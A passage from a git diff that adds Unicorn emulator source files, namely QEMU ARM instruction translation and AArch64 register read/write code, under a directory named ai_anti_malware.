gen_set_pc_im(s, s->pc); + s->svc_imm = extract32(insn, 0, 8); + s->is_jmp = DISAS_SWI; + break; + } + /* generate a conditional jump to next instruction */ + s->condlabel = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond ^ 1, s->condlabel); + s->condjmp = 1; + + /* jump to the offset */ + val = (uint32_t)s->pc + 2; + offset = ((int32_t)((uint32_t)insn << 24)) >> 24; + val += (int32_t)((uint32_t)offset << 1); + gen_jmp(s, val); + break; + + case 14: + if (insn & (1 << 11)) { + if (disas_thumb2_insn(env, s, insn)) + goto undef32; + break; + } + /* unconditional branch */ + val = (uint32_t)s->pc; + offset = ((int32_t)((uint32_t)insn << 21)) >> 21; + val += (int32_t)((uint32_t)offset << 1) + 2; + gen_jmp(s, val); + break; + + case 15: + if (disas_thumb2_insn(env, s, insn)) + goto undef32; + break; + } + + return; +undef32: + gen_exception_insn(s, 4, EXCP_UDEF, syn_uncategorized()); + return; +illegal_op: +undef: + gen_exception_insn(s, 2, EXCP_UDEF, syn_uncategorized()); +} + +/* generate intermediate code in gen_opc_buf and gen_opparam_buf for + basic block 'tb'. If search_pc is TRUE, also generate PC + information for each intermediate instruction. */ +static inline void gen_intermediate_code_internal(ARMCPU *cpu, + TranslationBlock *tb, + bool search_pc) +{ + CPUState *cs = CPU(cpu); + CPUARMState *env = &cpu->env; + DisasContext dc1, *dc = &dc1; + CPUBreakpoint *bp; + uint16_t *gen_opc_end; + int j, lj; + target_ulong pc_start; + target_ulong next_page_start; + int num_insns; + int max_insns; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + bool block_full = false; + + /* generate intermediate code */ + + /* The A64 decoder has its own top level loop, because it doesn't need + * the A32/T32 complexity to do with conditional execution/IT blocks/etc. + */ + if (ARM_TBFLAG_AARCH64_STATE(tb->flags)) { + gen_intermediate_code_internal_a64(cpu, tb, search_pc); + return; + } + + pc_start = tb->pc; + + dc->uc = env->uc; + dc->tb = tb; + + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + + dc->is_jmp = DISAS_NEXT; + dc->pc = pc_start; + + dc->singlestep_enabled = cs->singlestep_enabled; + dc->condjmp = 0; + + dc->aarch64 = 0; + dc->thumb = ARM_TBFLAG_THUMB(tb->flags); // qq + dc->bswap_code = ARM_TBFLAG_BSWAP_CODE(tb->flags); + dc->condexec_mask = (ARM_TBFLAG_CONDEXEC(tb->flags) & 0xf) << 1; + dc->condexec_cond = ARM_TBFLAG_CONDEXEC(tb->flags) >> 4; +#if !defined(CONFIG_USER_ONLY) + dc->user = (ARM_TBFLAG_PRIV(tb->flags) == 0); +#endif + dc->cpacr_fpen = ARM_TBFLAG_CPACR_FPEN(tb->flags); + dc->vfp_enabled = ARM_TBFLAG_VFPEN(tb->flags); + dc->vec_len = ARM_TBFLAG_VECLEN(tb->flags); + dc->vec_stride = ARM_TBFLAG_VECSTRIDE(tb->flags); + dc->c15_cpar = ARM_TBFLAG_XSCALE_CPAR(tb->flags); + dc->cp_regs = cpu->cp_regs; + dc->current_el = arm_current_el(env); + dc->features = env->features; + + /* Single step state. The code-generation logic here is: + * SS_ACTIVE == 0: + * generate code with no special handling for single-stepping (except + * that anything that can make us go to SS_ACTIVE == 1 must end the TB; + * this happens anyway because those changes are all system register or + * PSTATE writes). + * SS_ACTIVE == 1, PSTATE.SS == 1: (active-not-pending) + * emit code for one insn + * emit code to clear PSTATE.SS + * emit code to generate software step exception for completed step + * end TB (as usual for having generated an exception) + * SS_ACTIVE == 1, PSTATE.SS == 0: (active-pending) + * emit code to generate a software step exception + * end the TB + */ + dc->ss_active = ARM_TBFLAG_SS_ACTIVE(tb->flags); + dc->pstate_ss = ARM_TBFLAG_PSTATE_SS(tb->flags); + dc->is_ldex = false; + dc->ss_same_el = false; /* Can't be true since EL_d must be AArch64 */ + + tcg_ctx->cpu_F0s = tcg_temp_new_i32(tcg_ctx); + tcg_ctx->cpu_F1s = tcg_temp_new_i32(tcg_ctx); + tcg_ctx->cpu_F0d = tcg_temp_new_i64(tcg_ctx); + tcg_ctx->cpu_F1d = tcg_temp_new_i64(tcg_ctx); + tcg_ctx->cpu_V0 = tcg_ctx->cpu_F0d; + tcg_ctx->cpu_V1 = tcg_ctx->cpu_F1d; + /* FIXME: tcg_ctx->cpu_M0 can probably be the same as tcg_ctx->cpu_V0. */ + tcg_ctx->cpu_M0 = tcg_temp_new_i64(tcg_ctx); + next_page_start = (pc_start & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE; + lj = -1; + num_insns = 0; + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) + max_insns = CF_COUNT_MASK; + + tcg_clear_temp_count(); + + // Unicorn: early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + // imitate WFI instruction to halt emulation + gen_tb_start(tcg_ctx); + dc->is_jmp = DISAS_WFI; + goto tb_end; + } + + // Unicorn: trace this block on request + // Only hook this block if it is not broken from previous translation due to + // full translation cache + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + // save block address to see if we need to patch block size later + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } else { + env->uc->size_arg = -1; + } + + gen_tb_start(tcg_ctx); + + /* A note on handling of the condexec (IT) bits: + * + * We want to avoid the overhead of having to write the updated condexec + * bits back to the CPUARMState for every instruction in an IT block. So: + * (1) if the condexec bits are not already zero then we write + * zero back into the CPUARMState now. This avoids complications trying + * to do it at the end of the block. (For example if we don't do this + * it's hard to identify whether we can safely skip writing condexec + * at the end of the TB, which we definitely want to do for the case + * where a TB doesn't do anything with the IT state at all.) + * (2) if we are going to leave the TB then we call gen_set_condexec() + * which will write the correct value into CPUARMState if zero is wrong. + * This is done both for leaving the TB at the end, and for leaving + * it because of an exception we know will happen, which is done in + * gen_exception_insn(). The latter is necessary because we need to + * leave the TB with the PC/IT state just prior to execution of the + * instruction which caused the exception. + * (3) if we leave the TB unexpectedly (eg a data abort on a load) + * then the CPUARMState will be wrong and we need to reset it. + * This is handled in the same way as restoration of the + * PC in these situations: we will be called again with search_pc=1 + * and generate a mapping of the condexec bits for each PC in + * gen_opc_condexec_bits[]. restore_state_to_opc() then uses + * this to restore the condexec bits. + * + * Note that there are no instructions which can read the condexec + * bits, and none which can write non-static values to them, so + * we don't need to care about whether CPUARMState is correct in the + * middle of a TB. + */ + + /* Reset the conditional execution bits immediately. This avoids + complications trying to do it at the end of the block. */ + if (dc->condexec_mask || dc->condexec_cond) + { + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + store_cpu_field(tcg_ctx, tmp, condexec_bits); + } + do { + //printf(">>> arm pc = %x\n", dc->pc); +#ifdef CONFIG_USER_ONLY + /* Intercept jump to the magic kernel page. */ + if (dc->pc >= 0xffff0000) { + /* We always get here via a jump, so know we are not in a + conditional execution block. */ + gen_exception_internal(dc, EXCP_KERNEL_TRAP); + dc->is_jmp = DISAS_UPDATE; + break; + } +#else + if (dc->pc >= 0xfffffff0 && arm_dc_feature(dc, ARM_FEATURE_M)) { + /* We always get here via a jump, so know we are not in a + conditional execution block. */ + gen_exception_internal(dc, EXCP_EXCEPTION_EXIT); + dc->is_jmp = DISAS_UPDATE; + break; + } +#endif + + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == dc->pc) { + gen_exception_internal_insn(dc, 0, EXCP_DEBUG); + /* Advance PC so that clearing the breakpoint will + invalidate this TB. */ + dc->pc += 2; + goto done_generating; + } + } + } + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + tcg_ctx->gen_opc_pc[lj] = dc->pc; + tcg_ctx->gen_opc_condexec_bits[lj] = (dc->condexec_cond << 4) | (dc->condexec_mask >> 1); + tcg_ctx->gen_opc_instr_start[lj] = 1; + //tcg_ctx->gen_opc_icount[lj] = num_insns; + } + + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) + // gen_io_start(); + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, dc->pc); + } + + if (dc->ss_active && !dc->pstate_ss) { + /* Singlestep state is Active-pending. + * If we're in this state at the start of a TB then either + * a) we just took an exception to an EL which is being debugged + * and this is the first insn in the exception handler + * b) debug exceptions were masked and we just unmasked them + * without changing EL (eg by clearing PSTATE.D) + * In either case we're going to take a swstep exception in the + * "did not step an insn" case, and so the syndrome ISV and EX + * bits should be zero. + */ + assert(num_insns == 0); + gen_exception(dc, EXCP_UDEF, syn_swstep(dc->ss_same_el, 0, 0)); + goto done_generating; + } + + if (dc->thumb) { // qq + disas_thumb_insn(env, dc); + if (dc->condexec_mask) { + dc->condexec_cond = (dc->condexec_cond & 0xe) + | ((dc->condexec_mask >> 4) & 1); + dc->condexec_mask = (dc->condexec_mask << 1) & 0x1f; + if (dc->condexec_mask == 0) { + dc->condexec_cond = 0; + } + } + } else { + unsigned int insn; + + // end address tells us to stop emulation + if (dc->pc == dc->uc->addr_end) { + // imitate WFI instruction to halt emulation + dc->is_jmp = DISAS_WFI; + } else { + insn = arm_ldl_code(env, dc->pc, dc->bswap_code); + dc->pc += 4; + disas_arm_insn(dc, insn); + } + } + + if (dc->condjmp && !dc->is_jmp) { + gen_set_label(tcg_ctx, dc->condlabel); + dc->condjmp = 0; + } + + if (tcg_check_temp_count()) { + fprintf(stderr, "TCG temporary leak before "TARGET_FMT_lx"\n", + dc->pc); + } + + /* Translation stops when a conditional branch is encountered. + * Otherwise the subsequent code could get translated several times. + * Also stop translation when a page boundary is reached. This + * ensures prefetch aborts occur at the right place. */ + num_insns ++; + } while (!dc->is_jmp && tcg_ctx->gen_opc_ptr < gen_opc_end && + !cs->singlestep_enabled && + !dc->ss_active && + dc->pc < next_page_start && + num_insns < max_insns); + + if (tb->cflags & CF_LAST_IO) { + if (dc->condjmp) { + /* FIXME: This can theoretically happen with self-modifying + code. */ + cpu_abort(cs, "IO on conditional branch instruction"); + } + //gen_io_end(); + } + + /* if too long translation, save this info */ + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns) { + block_full = true; + } + +tb_end: + + /* At this stage dc->condjmp will only be set when the skipped + instruction was a conditional branch or trap, and the PC has + already been written. */ + if (unlikely(cs->singlestep_enabled || dc->ss_active)) { + /* Make sure the pc is updated, and raise a debug exception. */ + if (dc->condjmp) { + gen_set_condexec(dc); + if (dc->is_jmp == DISAS_SWI) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb)); + } else if (dc->is_jmp == DISAS_HVC) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_HVC, syn_aa32_hvc(dc->svc_imm)); + } else if (dc->is_jmp == DISAS_SMC) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_SMC, syn_aa32_smc()); + } else if (dc->ss_active) { + gen_step_complete_exception(dc); + } else { + gen_exception_internal(dc, EXCP_DEBUG); + } + gen_set_label(tcg_ctx, dc->condlabel); + } + if (dc->condjmp || !dc->is_jmp) { + gen_set_pc_im(dc, dc->pc); + dc->condjmp = 0; + } + gen_set_condexec(dc); + if (dc->is_jmp == DISAS_SWI && !dc->condjmp) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb)); + } else if (dc->is_jmp == DISAS_HVC && !dc->condjmp) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_HVC, syn_aa32_hvc(dc->svc_imm)); + } else if (dc->is_jmp == DISAS_SMC && !dc->condjmp) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_SMC, syn_aa32_smc()); + } else if (dc->ss_active) { + gen_step_complete_exception(dc); + } else { + /* FIXME: Single stepping a WFI insn will not halt + the CPU. */ + gen_exception_internal(dc, EXCP_DEBUG); + } + } else { + /* While branches must always occur at the end of an IT block, + there are a few other things that can cause us to terminate + the TB in the middle of an IT block: + - Exception generating instructions (bkpt, swi, undefined). + - Page boundaries. + - Hardware watchpoints. + Hardware breakpoints have already been handled and skip this code. + */ + gen_set_condexec(dc); + switch(dc->is_jmp) { + case DISAS_NEXT: + gen_goto_tb(dc, 1, dc->pc); + break; + default: + case DISAS_JUMP: + case DISAS_UPDATE: + /* indicate that the hash table must be used to find the next TB */ + tcg_gen_exit_tb(tcg_ctx, 0); + break; + case DISAS_TB_JUMP: + /* nothing more to generate */ + break; + case DISAS_WFI: + gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env); + break; + case DISAS_WFE: + gen_helper_wfe(tcg_ctx, tcg_ctx->cpu_env); + break; + case DISAS_SWI: + gen_exception(dc, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb)); + break; + case DISAS_HVC: + gen_exception(dc, EXCP_HVC, syn_aa32_hvc(dc->svc_imm)); + break; + case DISAS_SMC: + gen_exception(dc, EXCP_SMC, syn_aa32_smc()); + break; + } + if (dc->condjmp) { + gen_set_label(tcg_ctx, dc->condlabel); + gen_set_condexec(dc); + gen_goto_tb(dc, 1, dc->pc); + dc->condjmp = 0; + } + } + +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } else { + tb->size = dc->pc - pc_start; + //tb->icount = num_insns; + } + + env->uc->block_full = block_full; +} + +void gen_intermediate_code(CPUARMState *env, TranslationBlock *tb) +{ + gen_intermediate_code_internal(arm_env_get_cpu(env), tb, false); +} + +void gen_intermediate_code_pc(CPUARMState *env, TranslationBlock *tb) +{ + gen_intermediate_code_internal(arm_env_get_cpu(env), tb, true); +} + +#if 0 +static const char *cpu_mode_names[16] = { + "usr", "fiq", "irq", "svc", "???", "???", "mon", "abt", + "???", "???", "hyp", "und", "???", "???", "???", "sys" +}; + +void arm_cpu_dump_state(CPUState *cs, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + ARMCPU *cpu = ARM_CPU(cs); + CPUARMState *env = &cpu->env; + int i; + uint32_t psr; + + if (is_a64(env)) { + aarch64_cpu_dump_state(cs, f, cpu_fprintf, flags); + return; + } + + for(i=0;i<16;i++) { + cpu_fprintf(f, "R%02d=%08x", i, env->regs[i]); + if ((i % 4) == 3) + cpu_fprintf(f, "\n"); + else + cpu_fprintf(f, " "); + } + psr = cpsr_read(env); + cpu_fprintf(f, "PSR=%08x %c%c%c%c %c %s%d\n", + psr, + psr & (1 << 31) ? 'N' : '-', + psr & (1 << 30) ? 'Z' : '-', + psr & (1 << 29) ? 'C' : '-', + psr & (1 << 28) ? 'V' : '-', + psr & CPSR_T ? 'T' : 'A', + cpu_mode_names[psr & 0xf], (psr & 0x10) ? 32 : 26); + + if (flags & CPU_DUMP_FPU) { + int numvfpregs = 0; + if (arm_feature(env, ARM_FEATURE_VFP)) { + numvfpregs += 16; + } + if (arm_feature(env, ARM_FEATURE_VFP3)) { + numvfpregs += 16; + } + for (i = 0; i < numvfpregs; i++) { + uint64_t v = float64_val(env->vfp.regs[i]); + cpu_fprintf(f, "s%02d=%08x s%02d=%08x d%02d=%016" PRIx64 "\n", + i * 2, (uint32_t)v, + i * 2 + 1, (uint32_t)(v >> 32), + i, v); + } + cpu_fprintf(f, "FPSCR: %08x\n", (int)env->vfp.xregs[ARM_VFP_FPSCR]); + } +} +#endif + +void restore_state_to_opc(CPUARMState *env, TranslationBlock *tb, int pc_pos) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + if (is_a64(env)) { + env->pc = tcg_ctx->gen_opc_pc[pc_pos]; + env->condexec_bits = 0; + } else { + env->regs[15] = tcg_ctx->gen_opc_pc[pc_pos]; + env->condexec_bits = tcg_ctx->gen_opc_condexec_bits[pc_pos]; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.h new file mode 100644 index 0000000..44b160f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.h @@ -0,0 +1,116 @@ +#ifndef TARGET_ARM_TRANSLATE_H +#define TARGET_ARM_TRANSLATE_H + +/* internal defines */ +typedef struct DisasContext { + target_ulong pc; + uint32_t insn; + int is_jmp; + /* Nonzero if this instruction has been conditionally skipped. */ + int condjmp; + /* The label that will be jumped to when the instruction is skipped. */ + int condlabel; + /* Thumb-2 conditional execution bits. */ + int condexec_mask; + int condexec_cond; + struct TranslationBlock *tb; + int singlestep_enabled; + int thumb; + int bswap_code; +#if !defined(CONFIG_USER_ONLY) + int user; +#endif + bool cpacr_fpen; /* FP enabled via CPACR.FPEN */ + bool vfp_enabled; /* FP enabled via FPSCR.EN */ + int vec_len; + int vec_stride; + /* Immediate value in AArch32 SVC insn; must be set if is_jmp == DISAS_SWI + * so that top level loop can generate correct syndrome information. + */ + uint32_t svc_imm; + int aarch64; + int current_el; + GHashTable *cp_regs; + uint64_t features; /* CPU features bits */ + /* Because unallocated encodings generate different exception syndrome + * information from traps due to FP being disabled, we can't do a single + * "is fp access disabled" check at a high level in the decode tree. + * To help in catching bugs where the access check was forgotten in some + * code path, we set this flag when the access check is done, and assert + * that it is set at the point where we actually touch the FP regs. + */ + bool fp_access_checked; + /* ARMv8 single-step state (this is distinct from the QEMU gdbstub + * single-step support). + */ + bool ss_active; + bool pstate_ss; + /* True if the insn just emitted was a load-exclusive instruction + * (necessary for syndrome information for single step exceptions), + * ie A64 LDX*, LDAX*, A32/T32 LDREX*, LDAEX*. + */ + bool is_ldex; + /* True if a single-step exception will be taken to the current EL */ + bool ss_same_el; + /* Bottom two bits of XScale c15_cpar coprocessor access control reg */ + int c15_cpar; +#define TMP_A64_MAX 16 + int tmp_a64_count; + TCGv_i64 tmp_a64[TMP_A64_MAX]; + + // Unicorn engine + struct uc_struct *uc; +} DisasContext; + + +static inline int arm_dc_feature(DisasContext *dc, int feature) +{ + return (dc->features & (1ULL << feature)) != 0; +} + +static inline int get_mem_index(DisasContext *s) +{ + return s->current_el; +} + +/* target-specific extra values for is_jmp */ +/* These instructions trap after executing, so the A32/T32 decoder must + * defer them until after the conditional execution state has been updated. + * WFI also needs special handling when single-stepping. + */ +#define DISAS_WFI 4 +#define DISAS_SWI 5 +/* For instructions which unconditionally cause an exception we can skip + * emitting unreachable code at the end of the TB in the A64 decoder + */ +#define DISAS_EXC 6 +/* WFE */ +#define DISAS_WFE 7 +#define DISAS_HVC 8 +#define DISAS_SMC 9 + +#ifdef TARGET_AARCH64 +void a64_translate_init(struct uc_struct *uc); +void gen_intermediate_code_internal_a64(ARMCPU *cpu, + TranslationBlock *tb, + bool search_pc); +void gen_a64_set_pc_im(DisasContext *s, uint64_t val); +#else +static inline void a64_translate_init(struct uc_struct *uc) +{ +} + +static inline void gen_intermediate_code_internal_a64(ARMCPU *cpu, + TranslationBlock *tb, + bool search_pc) +{ +} + +static inline void gen_a64_set_pc_im(uint64_t val) +{ +} +#endif + +void arm_gen_test_cc(TCGContext *tcg_ctx, int cc, int label); + +#endif /* TARGET_ARM_TRANSLATE_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn.h new file mode 100644 index 0000000..a65b072 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn.h @@ -0,0 +1,29 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_ARM_H +#define UC_QEMU_TARGET_ARM_H + +// functions to read & write registers +int arm_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int arm_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); +int arm64_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int arm64_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void arm_reg_reset(struct uc_struct *uc); +void arm64_reg_reset(struct uc_struct *uc); + +DEFAULT_VISIBILITY +void arm_uc_init(struct uc_struct* uc); +void armeb_uc_init(struct uc_struct* uc); + +DEFAULT_VISIBILITY +void arm64_uc_init(struct uc_struct* uc); +void arm64eb_uc_init(struct uc_struct* uc); + +extern const int ARM_REGS_STORAGE_SIZE_arm; +extern const int ARM_REGS_STORAGE_SIZE_armeb; +extern const int ARM64_REGS_STORAGE_SIZE_aarch64; +extern const int ARM64_REGS_STORAGE_SIZE_aarch64eb; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_aarch64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_aarch64.c new file mode 100644 index 0000000..42bd7cc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_aarch64.c @@ -0,0 +1,248 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/arm/arm.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + + +const int ARM64_REGS_STORAGE_SIZE = offsetof(CPUARMState, tlb_table); + +static void arm64_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUARMState *)uc->current_cpu->env_ptr)->pc = address; +} + +void arm64_release(void* ctx); + +void arm64_release(void* ctx) +{ + struct uc_struct* uc; + ARMCPU* cpu; + TCGContext *s = (TCGContext *) ctx; + + g_free(s->tb_ctx.tbs); + uc = s->uc; + cpu = (ARMCPU*) uc->cpu; + g_free(cpu->cpreg_indexes); + g_free(cpu->cpreg_values); + g_free(cpu->cpreg_vmstate_indexes); + g_free(cpu->cpreg_vmstate_values); + + release_common(ctx); +} + +void arm64_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env = uc->cpu->env_ptr; + memset(env->xregs, 0, sizeof(env->xregs)); + + env->pc = 0; +} + +int arm64_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + // V & Q registers are the same + if (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31) { + regid += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; + } + if (regid >= UC_ARM64_REG_X0 && regid <= UC_ARM64_REG_X28) { + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.xregs[regid - UC_ARM64_REG_X0]; + } else if (regid >= UC_ARM64_REG_W0 && regid <= UC_ARM64_REG_W30) { + *(int32_t *)value = READ_DWORD(ARM_CPU(uc, mycpu)->env.xregs[regid - UC_ARM64_REG_W0]); + } else if (regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) { + float64 *dst = (float64*) value; + uint32_t reg_index = 2*(regid - UC_ARM64_REG_Q0); + dst[0] = ARM_CPU(uc, mycpu)->env.vfp.regs[reg_index]; + dst[1] = ARM_CPU(uc, mycpu)->env.vfp.regs[reg_index+1]; + } else if (regid >= UC_ARM64_REG_D0 && regid <= UC_ARM64_REG_D31) { + *(float64*)value = ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_D0)]; + } else if (regid >= UC_ARM64_REG_S0 && regid <= UC_ARM64_REG_S31) { + *(int32_t*)value = READ_DWORD(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_S0)]); + } else if (regid >= UC_ARM64_REG_H0 && regid <= UC_ARM64_REG_H31) { + *(int16_t*)value = READ_WORD(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_H0)]); + } else if (regid >= UC_ARM64_REG_B0 && regid <= UC_ARM64_REG_B31) { + *(int8_t*)value = READ_BYTE_L(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_B0)]); + } else if (regid >= UC_ARM64_REG_ELR_EL0 && regid <= UC_ARM64_REG_ELR_EL3) { + *(uint64_t*)value = ARM_CPU(uc, mycpu)->env.elr_el[regid - UC_ARM64_REG_ELR_EL0]; + } else if (regid >= UC_ARM64_REG_SP_EL0 && regid <= UC_ARM64_REG_SP_EL3) { + *(uint64_t*)value = ARM_CPU(uc, mycpu)->env.sp_el[regid - UC_ARM64_REG_SP_EL0]; + } else if (regid >= UC_ARM64_REG_ESR_EL0 && regid <= UC_ARM64_REG_ESR_EL3) { + *(uint64_t*)value = ARM_CPU(uc, mycpu)->env.cp15.esr_el[regid - UC_ARM64_REG_ESR_EL0]; + } else if (regid >= UC_ARM64_REG_FAR_EL0 && regid <= UC_ARM64_REG_FAR_EL3) { + *(uint64_t*)value = ARM_CPU(uc, mycpu)->env.cp15.far_el[regid - UC_ARM64_REG_FAR_EL0]; + } else if (regid >= UC_ARM64_REG_VBAR_EL0 && regid <= UC_ARM64_REG_VBAR_EL3) { + *(uint64_t*)value = ARM_CPU(uc, mycpu)->env.cp15.vbar_el[regid - UC_ARM64_REG_VBAR_EL0]; + } else { + switch(regid) { + default: break; + case UC_ARM64_REG_CPACR_EL1: + *(uint32_t *)value = ARM_CPU(uc, mycpu)->env.cp15.c1_coproc; + break; + case UC_ARM64_REG_TPIDR_EL0: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.tpidr_el0; + break; + case UC_ARM64_REG_TPIDRRO_EL0: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.tpidrro_el0; + break; + case UC_ARM64_REG_TPIDR_EL1: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.tpidr_el1; + break; + case UC_ARM64_REG_X29: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.xregs[29]; + break; + case UC_ARM64_REG_X30: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.xregs[30]; + break; + case UC_ARM64_REG_PC: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.pc; + break; + case UC_ARM64_REG_SP: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.xregs[31]; + break; + case UC_ARM64_REG_NZCV: + *(int32_t *)value = cpsr_read(&ARM_CPU(uc, mycpu)->env) & CPSR_NZCV; + break; + case UC_ARM64_REG_PSTATE: + *(uint32_t *)value = pstate_read(&ARM_CPU(uc, mycpu)->env); + break; + case UC_ARM64_REG_TTBR0_EL1: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.ttbr0_el1; + break; + case UC_ARM64_REG_TTBR1_EL1: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.ttbr1_el1; + break; + case UC_ARM64_REG_PAR_EL1: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.par_el1; + break; + case UC_ARM64_REG_MAIR_EL1: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.mair_el1; + break; + } + } + } + + return 0; +} + +int arm64_reg_write(struct uc_struct *uc, unsigned int *regs, void* const* vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31) { + regid += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; + } + if (regid >= UC_ARM64_REG_X0 && regid <= UC_ARM64_REG_X28) { + ARM_CPU(uc, mycpu)->env.xregs[regid - UC_ARM64_REG_X0] = *(uint64_t *)value; + } else if (regid >= UC_ARM64_REG_W0 && regid <= UC_ARM64_REG_W30) { + WRITE_DWORD(ARM_CPU(uc, mycpu)->env.xregs[regid - UC_ARM64_REG_W0], *(uint32_t *)value); + } else if (regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) { + float64 *src = (float64*) value; + uint32_t reg_index = 2*(regid - UC_ARM64_REG_Q0); + ARM_CPU(uc, mycpu)->env.vfp.regs[reg_index] = src[0]; + ARM_CPU(uc, mycpu)->env.vfp.regs[reg_index+1] = src[1]; + } else if (regid >= UC_ARM64_REG_D0 && regid <= UC_ARM64_REG_D31) { + ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_D0)] = * (float64*) value; + } else if (regid >= UC_ARM64_REG_S0 && regid <= UC_ARM64_REG_S31) { + WRITE_DWORD(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_S0)], *(int32_t*) value); + } else if (regid >= UC_ARM64_REG_H0 && regid <= UC_ARM64_REG_H31) { + WRITE_WORD(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_H0)], *(int16_t*) value); + } else if (regid >= UC_ARM64_REG_B0 && regid <= UC_ARM64_REG_B31) { + WRITE_BYTE_L(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_B0)], *(int8_t*) value); + } else if (regid >= UC_ARM64_REG_ELR_EL0 && regid <= UC_ARM64_REG_ELR_EL3) { + ARM_CPU(uc, mycpu)->env.elr_el[regid - UC_ARM64_REG_ELR_EL0] = *(uint64_t*)value; + } else if (regid >= UC_ARM64_REG_SP_EL0 && regid <= 